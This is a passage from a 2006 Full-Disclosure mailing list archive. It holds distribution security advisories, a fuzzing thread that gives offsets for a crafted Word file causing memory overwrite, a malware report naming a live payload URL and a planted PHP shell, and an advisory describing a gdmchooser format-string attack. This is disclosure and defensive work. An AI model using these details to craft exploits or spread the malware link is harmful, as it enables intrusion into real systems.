    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    22126 d7d8d7cf86591a3755dd317046ba2c76
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    24064 7a0fa8e36cde12402759073ff0ae412c
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    24014 c4da7fb2493c8df93ac18c45bc845cf0
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-1_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    22114 927a450dad783e92997def28f11351d5
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    22190 57c9821df4e02adcefff1cc880ee95df
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/640a3d8e/attachment.bin 

From kuldeep at turbolinux.co.in  Thu Dec 14 12:05:29 2006
From: kuldeep at turbolinux.co.in (Kuldeep)
Date: Thu, 14 Dec 2006 17:35:29 +0530
Subject: [Full-disclosure] mailing list submissions
Message-ID: <45813E09.7010507@turbolinux.co.in>

mailing list submissions

Kuldeeep



From stuart at cyberdelix.net  Thu Dec 14 12:36:07 2006
From: stuart at cyberdelix.net (lsi)
Date: Thu, 14 Dec 2006 12:36:07 -0000
Subject: [Full-disclosure] Intergenia hosting malware
Message-ID: <45814537.458.29CAFDD@stuart.cyberdelix.net>

This is a cracked Linux server being used to host exploits for 
Windows machines, which are spamvertised (presumably via a botnet) in 
socially engineered emails.  Kinda cute, ugly too.


- mail received from x42071c2e.ip.e-nt.net [66.7.28.46]
- e-nt.net is owned by ISP Eureka Networks 
http://www.eurekanetworks.net/
(66.7.28.46 is apparently one of their customers' boxes)

- received in an HTML-only email (abbreviated):

You have received a postcard from a family member!
You can pick up your postcard at the following web address:
http://www2.postcards.org/?a91-valets-cloud-31337

- link actually leads to http://62.75.249.235/~UWE/postcards.gif.exe
- postcards.gif.exe contains:

nicks    txt        45,985  24/11/06  14:18 nicks.txt
aliases  ini            11  15/02/04   2:28 aliases.ini
control  ini            68  10/12/06   0:43 control.ini
mirc     ini         4,015  10/12/06   0:43 mirc.ini
remote   ini           463  10/12/06   0:41 remote.ini
script   ini         7,539  28/11/06   5:08 script.ini
servers  ini           392  24/11/06  14:29 servers.ini
users    ini           126  24/11/06  14:07 users.ini
sup      bat            28  05/12/04  11:14 sup.bat
svchost  exe     1,790,464  23/02/04  23:26 svchost.exe
mirc     ico         5,694  07/11/04   2:28 mirc.ico
sup      reg           139  04/03/05  23:50 sup.reg

- reverse 62.75.249.235:
static-ip-62-75-249-235.inaddr.intergenia.de

- Intergenia is a hosting company in Germany (who were notified Dec 
13 at 18:40 GMT) .. http://www.intergenia.de/
- 62.75.249.235 runs Apache/2.0.53 (Linux/SUSE)
- http://62.75.249.235/~UWE/ contains:

 file.php                13-Oct-2006 14:55   37K  
 postcards.gif.exe       13-Dec-2006 15:58  690K  
 usa                     13-Oct-2006 14:56   11K  

- from the file dates, the server was cracked 2 months ago, while 
postcards was modified yesterday
- file.php is PHPShell by Macker - Version 2.6.6dev - August 28th 
2003
- usa is a Linux binary, apparently a compiled version of the 
"backdoor that creates a remote connection for tty's and allows 
attackers to login into the system without a need for a real user and 
password" described here:

http://www.securiteam.com/exploits/5FP0T20GAK.html

Also mentioned here:

http://www.kiesler.at/thread699.html


Stu

---
Stuart Udall
stuart at at cyberdelix.dot net - http://www.cyberdelix.net/

--- 
 * Origin: lsi: revolution through evolution (192:168/0.2)



From ge at linuxbox.org  Thu Dec 14 12:27:57 2006
From: ge at linuxbox.org (Gadi Evron)
Date: Thu, 14 Dec 2006 06:27:57 -0600 (CST)
Subject: [Full-disclosure] NOT a 0day! Re: [fuzzing]   OWASP Fuzzing page
In-Reply-To: <1165949078.24129.7.camel@localhost.localdomain>
Message-ID: 

On Tue, 12 Dec 2006, Joxean Koret wrote:
> 
> Wow! That's fun! The so called "Word 0 day" flaw also affects
> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> with the file:

This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
mode, on a mailing list (fuzzing mailing list).

I am not sure why I got this 10 times now, I thought the days of these
bounces were over. But I am tired of seeing every full-disclosure
vulnerability called a 0day anymore.

A 0day, whatever definition you use, is used in the wild before people are
aware of it.


> 
> joxean at joxeankoret $ abiword 12122006-djtest.doc
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> joxean at joxeankoret $ ooffice 12122006-djtest.doc
> OpenOffice.org lockfile found (/home/joxean/.openoffice/1.1.3/.lock)
> Using existing OpenOffice.org
> Application Errorsh: line 1: crash_report: command not found
> Application Error
> 
> Fatal exception: Signal 6
> Stack:
> /usr/lib/openoffice/program/libsal.so.3[0xb72e13ec]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1579]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1644]
> [0xffffe420]
> /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt
> +0x53)[0x8063029]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN23ImplVCLExceptionHandler6signalEP13oslSignalInfo+0xb2)[0xb7df894e]
> /usr/lib/openoffice/program/libvos3gcc3.so(_ZN3vos28_cpp_OSignalHandler_FunctionEPvP13oslSignalInfo+0x18)[0xb750b2f6]
> /usr/lib/openoffice/program/libvos3gcc3.so(_Z24_OSignalHandler_FunctionPvP13oslSignalInfo+0x26)[0xb750b2d6]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1496]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1625]
> [0xffffe420]
> /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt
> +0x174)[0x806314a]
> /usr/lib/openoffice/program/libsfx645li.so(_Z18SfxNewHandler_Implv
> +0x60)[0xb3042e46]
> /usr/lib/openoffice/program/soffice.bin[0x80869cf]
> /usr/lib/openoffice/program/soffice.bin(_Znaj+0x2f)[0x8086b61]
> /usr/lib/openoffice/program/libsw645li.so[0xb1422b5e]
> /usr/lib/openoffice/program/libsw645li.so[0xb1422a69]
> /usr/lib/openoffice/program/libsw645li.so[0xb14243f2]
> /usr/lib/openoffice/program/libsw645li.so[0xb1425022]
> /usr/lib/openoffice/program/libsw645li.so[0xb14212df]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e59c0]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e7f7c]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e813d]
> /usr/lib/openoffice/program/libsw645li.so[0xb12cc513]
> /usr/lib/openoffice/program/libsw645li.so[0xb147cc4e]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN14SfxObjectShell6DoLoadEP9SfxMedium+0xa15)[0xb2eae69d]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl4LoadEPK16SfxObjectFactory+0x563)[0xb2e2d1ef]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x1f3)[0xb2e2eb8d]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x39e)[0xb2e2ed38]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl5StartEv+0x7ca)[0xb2e2c3ba]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN19SfxFrameLoader_Impl4loadERKN3com3sun4star3uno8SequenceINS2_5beans13PropertyValueEEERKNS3_9ReferenceINS2_5frame6XFrameEEE+0x2361)[0xb2f10bb3]
> /usr/lib/openoffice/program/libfwk645li.so[0xb224207a]
> /usr/lib/openoffice/program/libfwk645li.so[0xb22485e4]
> /usr/lib/openoffice/program/libfwk645li.so[0xb223bb1c]
> /usr/lib/openoffice/program/libfwk645li.so[0xb225662c]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15DispatchWatcher23executeDispatchRequestsERKN4_STL6vectorINS0_15DispatchRequestENS1_9allocatorIS3_EEEE+0x230c)[0x807a34c]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15OfficeIPCThread22ExecuteCmdLineRequestsERNS_23ProcessDocumentsRequestE+0x17f)[0x807138d]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop11OpenClientsEv+0x1ef6)[0x80681d4]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop16OpenClients_ImplEPv+0x11)[0x8065ee7]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop24LinkStubOpenClients_ImplEPvS1_+0x18)[0x8065ed2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7f49674]
> /usr/lib/openoffice/program/libvcl645li.so(_Z19ImplWindowFrameProcPvP8SalFrametPKv+0x44e)[0xb7f49fc2]
> /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN10SalDisplay21DispatchInternalEventEv+0xd9)[0xb618ad45]
> /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN13SalX11Display5YieldEh+0x28)[0xb618ad80]
> /usr/lib/openoffice/program/libvclplug_gen645li.so[0xb6186b28]
> /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN7SalXLib5YieldEh
> +0x1d3)[0xb61855db]
> /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN14X11SalInstance5YieldEh+0x31)[0xb618e49b]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5YieldEv
> +0x64)[0xb7df3baa]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application7ExecuteEv
> +0x35)[0xb7df3ab7]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop4MainEv
> +0x1f56)[0x8065446]
> /usr/lib/openoffice/program/libvcl645li.so(_Z6SVMainv+0x4a)[0xb7df89bc]
> /usr/lib/openoffice/program/libvcl645li.so(main+0x4c)[0xb7fade6c]
> /lib/tls/libc.so.6(__libc_start_main+0xf4)[0xb6c18974]
> /usr/lib/openoffice/program/soffice.bin(_ZN6Window11RequestHelpERK9HelpEvent+0x31)[0x805e161]
> Aborted
> 
> I'm using OpenOffice.org 1.1.3 (Distributed with Debian Sarge 3.1). I
> will play a little with the POC to view if it affects OOffice in a way
> that code execution is possible.
> 
> ---
> Joxean Koret
> 
> > for something a little more technical
> > 
> > This is an email I sent someone else. (sorry mate, ill give a few
> > other ones for the 'project' :) )
> > 
> > I do not know of any fuzzer that would find this.  I do not know of
> > any fuzzing method, except the one I use that would find this.
> > 
> > =====
> > The file I have attached is a very basic two stage bug.  stage 1 (the
> > first mod) forces the code down a wrong path.  the second mod by
> > itsself is harmless, however when used with the first it will be the
> > first and part of the second overwrite.
> > 
> > I have use 41414141 as a marker to make it easier for you to see.
> > 
> > I have made it crash the wordviewer again to make it more obvious
> > 
> > Weight,
> > location: 00000274
> > value   : 00000022 - just so it crashes, values 00000001 -> 00000006
> > are probably the most useful for trying to overwrite a pointer. notice
> > that neighbouring areas can be weighted the same.
> > 
> > marker,
> > location: 000027e4
> > value   : 41414141
> > 
> > the weight destination address == ((weight * 4[this is EDI]) + 4
> > [ECX*4]) + source memory offest[ESI].
> > 
> > [also the meta data is microsofts, not mine]
> > ======
> > 
> > bug hugs,
> > 
> > disco.
> > _______________________________________________
> > fuzzing mailing list
> > fuzzing at whitestar.linuxbox.org
> > http://www.whitestar.linuxbox.org/mailman/listinfo/fuzzing
> -- 
> -----------------------------------
> Agian, agian, eg?n batez
> jeikiko dira egiazko Ziberotarrak,
> egiazko e?skald?nak,
> tirano arrotzen hiltzeko 
> eta gure aiten aitek ?tzi daikien 
> lurraren pop?liari erremetitzeko.
> -----------------------------------
> 



From Valdis.Kletnieks at vt.edu  Thu Dec 14 13:46:03 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 14 Dec 2006 08:46:03 -0500
Subject: [Full-disclosure] [Fwd: MOST URGENT]
In-Reply-To: Your message of "Thu, 14 Dec 2006 00:44:47 +0200."
	<4580825F.1050808@agent.co.il>
References: <4580825F.1050808@agent.co.il>
Message-ID: <200612141346.kBEDk3oQ021863@turing-police.cc.vt.edu>

On Thu, 14 Dec 2006 00:44:47 +0200, "Ag. System Administrator" said:
>
> Soooooooo stupid... :)

> I am Dr Borris Olga I represent Mr Mikhail Khordokovsky the former chief
> executive officer of Yukos Oil Company Russia

What a frikking idiot.  That's "the former chief executive officer who
recently died of Colonium-210 poisoning under mysterious circumstances".

Maybe we need to start insisting on certification or a degree from
a proper 419-oriented curriculum at Nigerian University.  These incompetent
419'ers are giving scammers a bad name.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/6871ab4f/attachment.bin 

From falco at gentoo.org  Thu Dec 14 13:55:44 2006
From: falco at gentoo.org (Raphael Marichez)
Date: Thu, 14 Dec 2006 14:55:44 +0100
Subject: [Full-disclosure] [ GLSA 200612-16 ] Links: Arbitrary Samba command
	execution
Message-ID: <20061214135544.GA15198@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Links: Arbitrary Samba command execution
      Date: December 14, 2006
      Bugs: #157028
        ID: 200612-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Links does not properly validate "smb://" URLs, making it vulnerable to
the execution of arbitrary Samba commands.

Background
==========

Links is a web browser running in both graphics and text modes.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /   Vulnerable   /                   Unaffected
    -------------------------------------------------------------------
  1  www-client/links      < 2.1_pre26                    >= 2.1_pre26

Description
===========

Teemu Salmela discovered that Links does not properly validate "smb://"
URLs when it runs smbclient commands.

Impact
======

A remote attacker could entice a user to browse to a specially crafted
"smb://" URL and execute arbitrary Samba commands, which would allow
the overwriting of arbitrary local files or the upload or the download
of arbitrary files. This vulnerability can be exploited only if
"smbclient" is installed on the victim's computer, which is provided by
the "samba" Gentoo package.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Links users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/links-2.1_pre26"

References
==========

  [ 1 ] CVE-2006-5925
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5925

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/49955d09/attachment.bin 

From falco at gentoo.org  Thu Dec 14 13:59:13 2006
From: falco at gentoo.org (Raphael Marichez)
Date: Thu, 14 Dec 2006 14:59:13 +0100
Subject: [Full-disclosure] [ GLSA 200612-17 ] GNU Radius: Format string
	vulnerability
Message-ID: <20061214135913.GC15198@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: GNU Radius: Format string vulnerability
      Date: December 14, 2006
      Bugs: #156376
        ID: 200612-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A format string vulnerabilty has been found in GNU Radius, which could
lead to the remote execution of arbitrary code.

Background
==========

GNU Radius is a GNU version of Radius, a server for remote user
authentication and accounting.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  net-dialup/gnuradius        < 1.4                          >= 1.4

Description
===========

A format string vulnerability was found in the sqllog function from the
SQL accounting code for radiusd. That function is only used if one or
more of the "postgresql", "mysql" or "odbc" USE flags are enabled,
which is not the default, except for the "server" 2006.1 and 2007.0
profiles which enable the "mysql" USE flag.

Impact
======

An unauthenticated remote attacker could execute arbitrary code with
the privileges of the user running radiusd, which may be the root user.
It is important to note that there is no default GNU Radius user for
Gentoo systems because no init script is provided with the package.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GNU Radius users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-dialup/gnuradius-1.4"

References
==========

  [ 1 ] CVE-2006-4181
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4181

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-17.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/7f299db6/attachment.bin 

From ge at linuxbox.org  Thu Dec 14 13:39:35 2006
From: ge at linuxbox.org (Gadi Evron)
Date: Thu, 14 Dec 2006 07:39:35 -0600 (CST)
Subject: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page
In-Reply-To: <4581525B.40304@free.fr>
Message-ID: 

On Thu, 14 Dec 2006, Jerome Athias wrote:
> Gadi Evron a ?crit :
> > On Tue, 12 Dec 2006, Joxean Koret wrote:
> >   
> >> Wow! That's fun! The so called "Word 0 day" flaw also affects
> >> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> >> with the file:
> >>     
> >
> > This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> > mode, on a mailing list (fuzzing mailing list).
> >
> > I am not sure why I got this 10 times now, I thought the days of these
> > bounces were over. But I am tired of seeing every full-disclosure
> > vulnerability called a 0day anymore.
> >
> > A 0day, whatever definition you use, is used in the wild before people are
> > aware of it.
> It makes sense and I totally agree with you.
> But the fact is that the things change (and not allways in the right 
> direction :-()... due to the society, money, research of popularity...
> Please remember us also the sense of the word "hacker" for instance, 
> since nowadays it's often use to speak about "bad guy/blackhat/pirate" - 
> i hope you'll agree that it's not the (our) sense

This battle is not lost. If we call it the right name and talk to the
press using the right terms, it is not lost yet. Maybe it should be, but
it is really confusing when it gets to the professional community.

> 
> /JA
> 



From security at mandriva.com  Thu Dec 14 17:03:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 14 Dec 2006 10:03:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:164-2 ] - Updated xorg-x11/XFree86
	packages fix integer overflow vulnerabilities
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                       MDKSA-2006:164-2
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : xorg-x11
 Date    : December 14, 2006
 Affected: Corporate 4.0
 _______________________________________________________________________
 
 Problem Description:
 
 Local exploitation of an integer overflow vulnerability in the
 'CIDAFM()' function in the X.Org and XFree86 X server could allow an
 attacker to execute arbitrary code with privileges of the X server,
 typically root (CVE-2006-3739).

 Local exploitation of an integer overflow vulnerability in the
 'scan_cidfont()' function in the X.Org and XFree86 X server could allow
 an attacker to execute arbitrary code with privileges of the X server,
 typically root (CVE-2006-3740).

 Updated packages are patched to address this issue.

 Update:

 Updated packages for Corporate Server 4.0 have been patched
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3739
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3740
 _______________________________________________________________________
 
 Updated Packages:
 
 Corporate 4.0:
 3658ca4cd8a4c6e9821c418a5ce7b4b3  corporate/4.0/i586/libxorg-x11-6.9.0-5.10.20060mlcs4.i586.rpm
 c98057d36ee6db65dd49bb540f2dfdb5  corporate/4.0/i586/libxorg-x11-devel-6.9.0-5.10.20060mlcs4.i586.rpm
 296d32cb0bb9a4361e5288cd0c136410  corporate/4.0/i586/libxorg-x11-static-devel-6.9.0-5.10.20060mlcs4.i586.rpm
 569c78c8b3842c72cfe361fb89d1989d  corporate/4.0/i586/X11R6-contrib-6.9.0-5.10.20060mlcs4.i586.rpm
 438e53654ce1c11d5e28cce7d8316c34  corporate/4.0/i586/xorg-x11-100dpi-fonts-6.9.0-5.10.20060mlcs4.i586.rpm
 6cd2047a430d3e10f68062e9e2ed7bc3  corporate/4.0/i586/xorg-x11-6.9.0-5.10.20060mlcs4.i586.rpm
 61d98fd62be172adc372ef7f10e8d0f0  corporate/4.0/i586/xorg-x11-75dpi-fonts-6.9.0-5.10.20060mlcs4.i586.rpm
 c46a82d37cb2377f9d232ee10fb837b4  corporate/4.0/i586/xorg-x11-cyrillic-fonts-6.9.0-5.10.20060mlcs4.i586.rpm
 e5be10030bae448b24998d65a2be9f6c  corporate/4.0/i586/xorg-x11-doc-6.9.0-5.10.20060mlcs4.i586.rpm
 9122ac82818d37d54e096d128866c64f  corporate/4.0/i586/xorg-x11-glide-module-6.9.0-5.10.20060mlcs4.i586.rpm
 1bfaa8464fefa7515a9abc6a4ff1da01  corporate/4.0/i586/xorg-x11-server-6.9.0-5.10.20060mlcs4.i586.rpm
 4c274b747483a610e16677f019c150f6  corporate/4.0/i586/xorg-x11-xauth-6.9.0-5.10.20060mlcs4.i586.rpm
 6d1fe79343156bbd680b3d60941380b3  corporate/4.0/i586/xorg-x11-Xdmx-6.9.0-5.10.20060mlcs4.i586.rpm
 c7bdfd3abc0b711abe72e32ffa0b8e76  corporate/4.0/i586/xorg-x11-xfs-6.9.0-5.10.20060mlcs4.i586.rpm
 a62d0994768a936bbdef00a42a40e114  corporate/4.0/i586/xorg-x11-Xnest-6.9.0-5.10.20060mlcs4.i586.rpm
 7e586568c538c87728f51cdee94ba050  corporate/4.0/i586/xorg-x11-Xprt-6.9.0-5.10.20060mlcs4.i586.rpm
 a4a6aabeae772da093d771695d350dc0  corporate/4.0/i586/xorg-x11-Xvfb-6.9.0-5.10.20060mlcs4.i586.rpm 
 eb0860600fe024f88c015f77976d61c4  corporate/4.0/SRPMS/xorg-x11-6.9.0-5.10.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 95d2a9ad359eb51d2c8743a8f2d8cc21  corporate/4.0/x86_64/lib64xorg-x11-6.9.0-5.10.20060mlcs4.x86_64.rpm
 91629018178a74304f232c38b29ea831  corporate/4.0/x86_64/lib64xorg-x11-devel-6.9.0-5.10.20060mlcs4.x86_64.rpm
 93465357b9ff908de20c7448d501c1fa  corporate/4.0/x86_64/lib64xorg-x11-static-devel-6.9.0-5.10.20060mlcs4.x86_64.rpm
 4fe4964642e28e972c34c759d1e726d1  corporate/4.0/x86_64/X11R6-contrib-6.9.0-5.10.20060mlcs4.x86_64.rpm
 461967ff7add4e31702460db4ee6e602  corporate/4.0/x86_64/xorg-x11-100dpi-fonts-6.9.0-5.10.20060mlcs4.x86_64.rpm
 6f5fbabba03318860472c0ce5c0a65e4  corporate/4.0/x86_64/xorg-x11-6.9.0-5.10.20060mlcs4.x86_64.rpm
 444fc50e3d9cccf09601026c7487d78e  corporate/4.0/x86_64/xorg-x11-75dpi-fonts-6.9.0-5.10.20060mlcs4.x86_64.rpm
 20da8a1239bc532d7c45d32931360d7b  corporate/4.0/x86_64/xorg-x11-cyrillic-fonts-6.9.0-5.10.20060mlcs4.x86_64.rpm
 40af6535454c3ea73dc4f6473b9f24c0  corporate/4.0/x86_64/xorg-x11-doc-6.9.0-5.10.20060mlcs4.x86_64.rpm
 2c7d093af7530397c8b935409080c25c  corporate/4.0/x86_64/xorg-x11-glide-module-6.9.0-5.10.20060mlcs4.x86_64.rpm
 51b4f1d2ef0118a2ed84b430bc89242e  corporate/4.0/x86_64/xorg-x11-server-6.9.0-5.10.20060mlcs4.x86_64.rpm
 66721b5e94867256724faf443ae1e8a3  corporate/4.0/x86_64/xorg-x11-xauth-6.9.0-5.10.20060mlcs4.x86_64.rpm
 8e37a1b93e5ae3850d1259eea8aa3de3  corporate/4.0/x86_64/xorg-x11-Xdmx-6.9.0-5.10.20060mlcs4.x86_64.rpm
 d705258a79d0cb500560de0f3babe596  corporate/4.0/x86_64/xorg-x11-xfs-6.9.0-5.10.20060mlcs4.x86_64.rpm
 325bfc125311d543b8808133345afb00  corporate/4.0/x86_64/xorg-x11-Xnest-6.9.0-5.10.20060mlcs4.x86_64.rpm
 ae37ee6f2b895664bfddb06798180907  corporate/4.0/x86_64/xorg-x11-Xprt-6.9.0-5.10.20060mlcs4.x86_64.rpm
 897a5a32aa8e71cd3b644bc75e33f98a  corporate/4.0/x86_64/xorg-x11-Xvfb-6.9.0-5.10.20060mlcs4.x86_64.rpm 
 eb0860600fe024f88c015f77976d61c4  corporate/4.0/SRPMS/xorg-x11-6.9.0-5.10.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFgVlLmqjQ0CJFipgRAiRuAKDmfb4FZioexZ9AGFV+Ao1UFibNFwCbBrBj
8tuWJMZfMYQMzHlWuRM/BF0=
=xvrZ
-----END PGP SIGNATURE-----



From labs-no-reply at idefense.com  Thu Dec 14 17:36:08 2006
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 14 Dec 2006 12:36:08 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.14.06: GNOME
 Foundation Display Manager gdmchooser Format String Vulnerability
Message-ID: <45818B88.20709@idefense.com>

GNOME Foundation Display Manager gdmchooser Format String Vulnerability

iDefense Security Advisory 12.14.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 14, 2006

I. BACKGROUND

The gdmchooser program provides XDMCP (X Display Manager Control Protocol)
functionality to the GNOME Display Manager. This protocol allows a user to
interact remote systems via the local X11 display.

II. DESCRIPTION

Local exploitation of a format string vulnerability in GNOME Foundation's
GNOME Display Manager host chooser window (gdmchooser) could allow an
unauthenticated attacker to execute arbitrary code on the affected system.

The vulnerability specifically exists in the handling of values entered
when choosing a remote host to connect to from the current system. The
following snippet from gdmchooser.c shows the vulnerable code:

1395    msg = g_strdup_printf (_("Cannot find the host \"%s\". "
1396                             "Perhaps you have mistyped it."),
1397                           name);
1398  
1399    dialog = ve_hig_dialog_new
1400    (GTK_WINDOW (chooser) /* parent */,
1401     GTK_DIALOG_MODAL /* flags */,
1402     GTK_MESSAGE_ERROR,
1403     GTK_BUTTONS_OK,
1404     _("Cannot find host"),
1405     msg);
1406    
1407    g_free (msg);
1408  

The error dialog uses the temporary value 'msg', constructed from 'name'
when the host is not found. By supplying a sequence of formatting
operations which modify memory values, an unauthenticated attacker can
execute code with the permissions under the gdm account.

III. ANALYSIS

Successful local exploitation of this vulnerability would allow an
unauthenticated attacker to execute arbitrary code with the privileges of
the gdm service.

In order to exploit this vulnerability, the attacker would need to have
access to the system running gdmchooser. Connecting remotely to this
service will not work as the functionality is designed to connect to a
remote server already, and proxying is not allowed.

The attacker selects the option to run the gdmchooser, and then types the
format string into the dialog box. They can send a string which displays
the contents of the stack, and use there construct a format string which
